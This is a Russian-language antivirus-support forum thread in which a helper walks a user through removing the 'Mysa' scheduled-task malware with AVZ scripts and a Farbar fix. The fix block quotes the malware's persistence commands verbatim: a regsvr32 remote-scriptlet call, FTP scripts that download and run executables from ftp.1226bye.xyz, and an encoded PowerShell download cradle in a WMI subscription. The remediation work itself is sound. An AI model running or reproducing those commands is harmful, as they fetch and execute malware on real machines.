Перейти к содержанию
Правила раздела

[РЕШЕНО] Как избавиться от процессов Mysa,1,2,3

Матвей Ульченко

От Матвей Ульченко
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

Матвей Ульченко Новичок

Матвей Ульченко

Опубликовано
Опубликовано (изменено)

Здравствуйте, сегодня 16 апреля 2019 года обнаружил данный процесс musa 1 2 3 на своем ПК. У вас на сайте прочёл что это вирус , помогите избавиться .

CollectionLog-2019.04.16-19.32.zip

Изменено пользователем Матвей Ульченко
Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

Выполните скрипт в AVZ из папки Autologger

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
QuarantineFile('C:\Windows\System32\wbiosrvp.dll','');
 QuarantineFile('C:\Windows\System32\themctrl.dll','');
 QuarantineFile('C:\Windows\debug\item.dat','');
 DeleteFile('C:\Windows\debug\item.dat','32');
 DeleteFile('C:\Windows\System32\themctrl.dll','64');
 DeleteFile('C:\Windows\System32\wbiosrvp.dll','64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\wbiosrvp\Parameters','ServiceDll','x64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\themctrl\Parameters','ServiceDll','x64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.
  • Обратите внимание: будет выполнена перезагрузка компьютера.
Выполните скрипт в AVZ

begin
CreateQurantineArchive('c:\quarantine.zip');
end.
c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678

Полученный после загрузки ответ сообщите здесь.

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

 

+ Сделайте лог TDSSkiller

  • Согласен 2
Ссылка на комментарий
Поделиться на другие сайты
Матвей Ульченко Новичок

Матвей Ульченко

Опубликовано
  • Автор
Опубликовано

Результат загрузки Файл сохранён как 190416_175013_quarantine_5cb615d522577.zip Размер файла 3216268 MD5 6f8284bbd4bd43016a01e2955b46e4e9

 

CollectionLog-2019.04.16-20.59.zip

TDSSKiller.3.1.0.28_16.04.2019_20.50.46_log.zip

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

Выполните скрипт в AVZ из папки Autologger

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 TerminateProcessByName('c:\windows\temp\conhost.exe');
 QuarantineFile('c:\windows\temp\conhost.exe','');
 TerminateProcessByName('C:\Windows\inf\lsmm.exe');
 QuarantineFile('C:\Windows\inf\lsmm.exe','');
 DeleteFile('C:\Windows\inf\lsmm.exe','32');
 DeleteFile('c:\windows\temp\conhost.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.
  • Обратите внимание: будет выполнена перезагрузка компьютера.
Выполните скрипт в AVZ

begin
CreateQurantineArchive('c:\quarantine.zip');
end.
c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678

Полученный после загрузки ответ сообщите здесь.

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

  • Согласен 2
Ссылка на комментарий
Поделиться на другие сайты
Матвей Ульченко Новичок

Матвей Ульченко

Опубликовано
  • Автор
Опубликовано

Результат загрузки Файл сохранён как 190416_181427_quarantine_5cb61b8331136.zip Размер файла 759337 MD5 283b7687575fabd6eb8921f107885b6a

 

 

CollectionLog-2019.04.16-21.17.zip

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

3munStB.png

3. Нажмите кнопку Scan.

4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.

5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).

6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

1. Выделите следующий код:

Start::
CreateRestorePoint:
2019-02-19 12:39 - 2019-04-16 23:45 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2019-03-04 18:34 - 2019-04-16 23:44 - 000000080 _____ C:\Windows\system32\s
2019-03-04 18:34 - 2019-04-16 23:44 - 000000078 _____ C:\Windows\system32\ps
2019-03-04 18:34 - 2019-04-16 23:44 - 000000076 _____ C:\Windows\system32\p
2019-03-04 18:29 - 2019-04-16 23:45 - 000023552 _____ (Microsoft Corporation) C:\Windows\system\down.exe
2019-04-16 21:12 - 2019-04-16 23:46 - 000003518 _____ C:\Windows\System32\Tasks\Mysa
2019-04-16 21:12 - 2019-04-16 23:46 - 000003504 _____ C:\Windows\System32\Tasks\Mysa3
2019-04-16 21:12 - 2019-04-16 23:46 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2
2019-04-16 21:12 - 2019-04-16 23:46 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2019-04-16 21:12 - 2019-04-16 23:46 - 000003186 _____ C:\Windows\System32\Tasks\ok
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.1226bye.xyz:280/v.sct scrobj.dll <==== ATTENTION
Task: {0C030FAE-3EC7-4DFD-97E4-5D01A9811954} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {77C89B29-5548-462B-86C0-052678BBF1F7} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION
Task: {83761A7F-A43C-4A8E-810B-0A1926E4AE1F} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {BA0044BE-A915-4971-A0FD-BA9780C7E747} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
Task: {BFF224DA-CD77-47C4-B7CE-C2E419D825FC} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {E8549826-1A31-4FFC-8F35-9AE02D93FD6C} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {EA71F1DC-3103-49E2-B251-6021B28BC8A1} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 665 more characters).] <==== ATTENTION
Reboot:
End::
2. Скопируйте выделенный текст (правая кнопка мышиКопировать).

3. Запустите Farbar Recovery Scan Tool.

4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.
Ссылка на комментарий
Поделиться на другие сайты
Гость
Эта тема закрыта для публикации ответов.
 Share
Перейти к списку тем

  • Похожий контент

    • Dad Paul
      [РЕШЕНО] Не могу избавиться от троянов
      От Dad Paul
      Вопреки всем предупреждениям и блокировкам, решил скачать читы на PUBG. В итоге-читы так и не получилось поставить,а вирусы получил. Видимых изменений в системе не наблюдаю, но каждые 5-15 минут находит вирусы трояна(разные),лечит\удаляет и всё по новой. Помогите избавиться


      avz_log.txt Addition.txt FRST.txt
    • Сергей98352247
      Пропала мышь и появились новые процессы
      От Сергей98352247
      Пропала мышь, Kaspersky, появилось много новых процессов. Выключил компьютер, выдернул сетевой шнур, включил. Получил помимо упомянутого, отсутствие всех установленных программ и на вкладке недавние те которые были ранее, ноне все, плюс новые. ничего не открывал, выключил комп.
      Сообщение от модератора kmscom Тема перемещена из раздела Помощь в борьбе с шифровальщиками-вымогателями
    • JAZZ and JAZZ
      [РЕШЕНО] Процесс fc.exe нагружает ЦП и GPU.
      От JAZZ and JAZZ
      При включении ноутбука и загрузки ОС через 2-5мин начинается нагрев ЦП до 92 градусов GPU до 63 градусов.
      При этом сам запускается процесс fc.exe в видеокарте NVIDIA хотя она должна быть не активной, проблему поймал день назад ноут уходит в сильный перегрев.
      Пробовал лечить, результата нет.
      CollectionLog-2024.10.07-23.37.zip
    • EDRG
      [РЕШЕНО] dwm.exe - 2 процесса, один из них потребляет много ресурса ЦП и как-то взаимодействует с неизвестным ip
      От EDRG
      CollectionLog-2025.01.15-04.30.zipЗдравствуйте, столкнулся с проблемой дубля файла dwm.exe. Из особенностей - он полностью повторяет путь, по всей видимости, оригинального файла и они будто являются одной и той же программой. При включении диспетчера задач резко сбрасывает потребление ЦП до сотых процента. Проблема не нова, судя по всему, и для удобства вставлю ссылки на решения похожей проблемы. 
       
      Сам я мало что понимаю в кодах, описанных в этих темах, чтобы их на свой лад изменять. Поэтому не сочтите за наглость, но я прошу о помощи.

      Проверил компьютер двумя рекомендованными утилитами. Интересующий файл они не обнаружили (разве что dr web обнаружил им определённый троян di.exe, но, вроде, сам его удалил).
      Ниже прикрепляю дополнительный скрин из утилиты System informer (ранее, Process hacker 2).

       

       
    • Павел11
      [РЕШЕНО] heur.trojan.multi.genbadur.genw
      От Павел11
      Появился вирус, вроде бы даже лечится Касперским, но после перезагрузки появляется вновь
       
      Событие: Обнаружен вредоносный объект
      Пользователь: MSI\fayde
      Тип пользователя: Активный пользователь
      Компонент: Антивирусная проверка
      Результат: Обнаружено
      Описание результата: Обнаружено
      Тип: Троянское приложение
      Название: HEUR:Trojan.Multi.GenBadur.genw
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Файл
      Имя объекта: System Memory
      Причина: Базы
      Дата выпуска баз: Сегодня, 06.11.2024 17:20:00
      CollectionLog-2024.11.06-21.34.zip
×
×
  • Создать...